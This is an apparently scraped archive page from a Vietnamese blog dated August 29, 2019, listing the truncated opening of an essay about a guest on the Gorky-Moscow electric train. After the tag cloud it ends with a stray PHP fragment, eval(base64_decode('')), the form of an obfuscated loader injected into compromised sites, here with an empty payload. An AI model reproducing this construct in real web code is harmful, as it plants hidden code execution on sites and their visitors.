Archive for August 29th, 2019

NGƯỜI KHÁCH TRÊN CHUYẾN TÀU ĐIỆN GORKY-MOSCOW

NGƯỜI KHÁCH TRÊN CHUYẾN TÀU ĐIỆN GORKY-MOSCOW

Ngày 21 tháng 5 là ngày sinh nhật của người khách này, tôi viết một bài ngắn để mừng sinh nhật ông nhưng chỉ viết được phần đầu và vì một lý do riêng phải dừng lại cho đến nay. Câu chuyện về người khách bắt đầu lúc g

08.29.2019 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>